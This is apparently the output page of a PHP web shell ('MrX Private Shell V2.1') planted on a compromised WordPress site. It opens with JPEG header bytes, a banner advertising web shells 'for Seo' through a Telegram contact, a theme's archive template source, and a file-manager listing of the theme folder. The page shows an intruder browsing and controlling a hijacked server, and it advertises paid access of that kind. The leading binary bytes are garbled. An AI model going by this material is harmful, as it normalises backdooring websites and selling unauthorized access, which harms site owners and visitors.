����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* $Desc
*
* @author Gaviasthemes Team
* @copyright Copyright (C) 2020 gaviasthemes. All Rights Reserved.
* @license GNU/GPL v2 or later http://www.gnu.org/licenses/gpl-2.0.html
*
*/
get_header();
$sidebar_layout_config = indutri_get_option('archive_post_sidebar', '');
$left_sidebar = indutri_get_option('archive_post_left_sidebar', '');
$right_sidebar = indutri_get_option('archive_post_right_sidebar', '');
$left_sidebar_config = array('active' => false);
$right_sidebar_config = array('active' => false);
$main_content_config = array('class' => 'col-lg-12 col-lg-12 col-md-12 col-sm-12 col-xs-12');
$sidebar_config = indutri_sidebar_global($sidebar_layout_config, $left_sidebar, $right_sidebar);
extract($sidebar_config);
?>
<section id="wp-main-content" class="clearfix main-page title-layout-standard">
<?php do_action( 'indutri_before_page_content' ); ?>
<div class="container">
<div class="row main-page-content">
<div class="content-page <?php echo esc_attr($main_content_config['class']); ?>">
<div id="wp-content" class="wp-content">
<?php if ( have_posts() ) : ?>
<div class="post-area results-search clearfix post-items">
<div class="lg-block-grid-2 md-block-grid-2 sm-block-grid-2 xs-block-grid-1 post-masonry-style">
<?php while ( have_posts() ) : the_post(); ?>
<div class="item-columns item-masory">
<div class="post post-block margin-bottom-60 clearfix">
<?php if(has_post_thumbnail()){ ?>
<div class="post-thumbnail">
<?php the_post_thumbnail(); ?>
</div>
<?php } ?>
<div class="entry-content">
<div class="content-inner">
<div class="entry-meta">
<?php indutri_posted_on(); ?>
</div>
<h2 class="entry-title"><a href="<?php echo esc_url( get_permalink() ) ?>" rel="bookmark"><?php the_title() ?></a></h2>
<div class="desc"><?php echo indutri_limit_words( 16, get_the_excerpt(), '' );?></div>
<?php the_tags( '<footer class="entry-footer"><span class="tag-links">', '', '</span></footer>' ); ?>
</div>
</div><!-- .entry-content -->
</div>
</div>
<?php endwhile; ?>
</div>
</div>
<?php else: ?>
<div class="alert alert-danger"><?php echo esc_html__( 'Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'indutri' ); ?></div>
<?php endif ?>
<div class="pagination">
<?php echo indutri_pagination(); ?>
</div>
</div>
</div>
<!-- Left sidebar -->
<?php if($left_sidebar_config['active']): ?>
<div class="sidebar wp-sidebar sidebar-left <?php echo esc_attr($left_sidebar_config['class']); ?>">
<?php do_action( 'indutri_before_sidebar' ); ?>
<div class="sidebar-inner">
<?php dynamic_sidebar($left_sidebar_config['name'] ); ?>
</div>
<?php do_action( 'indutri_after_sidebar' ); ?>
</div>
<?php endif ?>
<!-- Right Sidebar -->
<?php if($right_sidebar_config['active']): ?>
<div class="sidebar wp-sidebar sidebar-right <?php echo esc_attr($right_sidebar_config['class']); ?>">
<?php do_action( 'indutri_before_sidebar' ); ?>
<div class="sidebar-inner">
<?php dynamic_sidebar($right_sidebar_config['name'] ); ?>
</div>
<?php do_action( 'indutri_after_sidebar' ); ?>
</div>
<?php endif ?>
</div>
</div>
<?php do_action( 'indutri_after_page_content' ); ?>
</section>
<?php get_footer(); ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| includes | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| sass | Folder | 0755 |
|
|
| templates | Folder | 0755 |
|
|
| tribe | Folder | 0755 |
|
|
| tribe-events | Folder | 0755 |
|
|
| woocommerce | Folder | 0755 |
|
|
| 404.php | File | 985 B | 0644 |
|
| archive.php | File | 2.27 KB | 0644 |
|
| comments.php | File | 4.04 KB | 0644 |
|
| content-audio.php | File | 2.55 KB | 0644 |
|
| content-gallery.php | File | 2.89 KB | 0644 |
|
| content-link.php | File | 2.36 KB | 0644 |
|
| content-quote.php | File | 2.39 KB | 0644 |
|
| content-video.php | File | 2.68 KB | 0644 |
|
| content.php | File | 2.44 KB | 0644 |
|
| footer.php | File | 1.7 KB | 0644 |
|
| functions.php | File | 39.27 KB | 0644 |
|
| functions.php_bak | File | 12.7 KB | 0644 |
|
| functions.txt | File | 12.7 KB | 0644 |
|
| header-builder.php | File | 1.78 KB | 0644 |
|
| header-default.php | File | 3.54 KB | 0644 |
|
| header.php | File | 500 B | 0644 |
|
| index.php | File | 2.54 KB | 0644 |
|
| page.php | File | 588 B | 0644 |
|
| readme.txt | File | 0 B | 0644 |
|
| screenshot.png | File | 210.79 KB | 0644 |
|
| search.php | File | 4.02 KB | 0644 |
|
| searchform.php | File | 674 B | 0644 |
|
| sidebar.php | File | 280 B | 0644 |
|
| single-event.php | File | 353 B | 0644 |
|
| single-footer.php | File | 974 B | 0644 |
|
| single-gallery.php | File | 1.09 KB | 0644 |
|
| single-gva_header.php | File | 922 B | 0644 |
|
| single-gva_team.php | File | 6.39 KB | 0644 |
|
| single-portfolio.php | File | 5.61 KB | 0644 |
|
| single-service.php | File | 3.14 KB | 0644 |
|
| single.php | File | 3.21 KB | 0644 |
|
| style.css | File | 935 B | 0644 |
|
| taxonomy-category_portfolio.php | File | 3.06 KB | 0644 |
|
| taxonomy-category_service.php | File | 3.04 KB | 0644 |
|
| wpml-config.xml | File | 11.38 KB | 0644 |
|